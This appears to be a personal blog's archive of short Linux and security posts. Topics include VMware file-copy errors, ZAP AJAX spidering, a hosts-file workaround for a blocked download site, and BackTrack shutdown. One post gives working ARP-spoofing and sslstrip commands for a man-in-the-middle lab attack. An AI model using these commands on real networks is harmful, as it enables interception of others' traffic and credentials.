Archive for the ‘linux’ Category
PROBLEM: When copying files from VMWare player to the host (Windows host in this case), you get “Cannot write to local file”.
SOLUTION: Make space. Clear temp and %temp% directories, on your operating system drive.
I was trying to copy 5 GB of files from my VMWare player guest OS Kali Linux to my Windows Host. VMWare player displays Copying file “part2.rar” from virtual machine and exits with “Cannot write to local file. Cancelling the file copy operation.”.
This knowledge base from vmware hints disabling tempfs in linux operating systems. https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2056353
I looked at the temp and %temp% windows directories and dicovered the below temp location where VMWarePlayer copies the files from the VM Guest, and from there it copies to the destination directory in the host OS.
My Operating System drive C: was full, and I had to clear the temp directories and free up some space to do 5 GB copy operation from WMWare Player Guest Kali Linux to Windows Host.
OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)
0. Make sure you are proxying via Zap (I love FoxyProxy)
1. Identify the session cookie
1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]
1.2 go do some browsing
2. Set an active session from the Http Sessions tab
3. Identify and exclude the Log off request from the spider (and scanner, and proxy, ir required)
Good luck with your Ajax spidering in ZAP!
You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?
Victim – Windows 7 – 192.168.100.11
Attacker – Kali linux – 192.168.100.215
arpspoof gateway – 192.168.100.1
•Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
•Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.100.11 192.168.100.1
•Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip.py -l <listenPort>
Scroll to the solution section or click here if you want to skip some rant.
It’s May 1, I live in India, I desperately wanted to download some learning material, and uploaded.net is blocked here. Well, say ‘fuck’ to the government’s censorship. I used to think it was the imbecile firewall at my office, but when it tried at my home internet recently, IE gives PCBD, and chrome gives you bummer. I did not want to use a web proxy right off, because sometimes they just do not work with AJAX enabled, cookie enabled websites. And most of them do not support file downloads (at least in my experience, may be i haven’t tried harder).
I hate it when the security builders leave loopholes, and hide behind the face of the infamous dialog in the security industry ‘Nothing is 100% secure’. Well, you forgot the basics. When you block a website, you don’t block it based on the domain name. You got to be more advanced than a firewall using school kid.
I will show you a simple hosts file entry technique here to bypass the tyranny.
Wow, don’t I relish and cherish to be a computer engineer. Happy labor day.
When you try to access uploaded.net, you can’t connect to the server. Both http, and https equivalent of the links. Your nslookup, ping fails. Somehow you manage to get the up of uploaded.net from online dns lookup websites, and instead of http://uploaded.net you try the ip http://188.8.131.52/, even then you can’t connect.
1. Go to you favorite DNS look up website, mine happens to me http://ping.eu/nslookup/
2. Look up http://uploaded.net and get the ip addess
3. Add a hosts file entry to uploaded.net as 184.108.40.206. (Remember the ip address of uploaded.net may change from the time of this writing). Windows hosts file location C:\Windows\System32\drivers\etc\hosts. Linux hosts file location /etc/hosts. Open a notepad as admin (if UAC enabled in Windows Vista or abobe), use sudo in linux for your favorite text editor (gedit ), if not running as root.
4. Save the hosts file, breath the air of liberation. (and a free chick ad)
5. Click the Free Download, or Premium Download (if you own a Villa, and not happen to be a miser)
6. Once your download link is generated, you get another bummer, this time the URL in the address bar happens to be a subdomain of uploaded.net with different IP address, and hence blocked. Hang on, let’s copy the complete FQDN of the server, and do a DNS look up at http://ping.eu/nslookup/
7. DNS look up of http://fra-7m15-stor07.uploaded.net/ at http://ping.eu/nslookup yields an ip – 220.127.116.11. Add a host entry for the same server and ip. (Note: the download server may vary based on your location, make sure you copy the correct server name from the address for a dns lookup)
8. Go back to your browser, hit the refresh button. See the magic.
Once again, happy labor day!
Update – Aug 9 2014 – Some commenter said it does not work anymore, so here’s a screenshot for you today. Still works.
Just got my BT5R3 (BackTrack 5 Release 3) on a VMWare player. Tried the shutdown command, didn’t work as expected. All that happens after the shuwdown command is the computer shuts down, but it does not switch the power off. Here’s below a lot of ways in which you can shutdown your Back Track with power off option.
Courtesy of and Compiled from http://www.backtrack-linux.org/forums/showthread.php?t=42508
Any of the below commands work just super fine.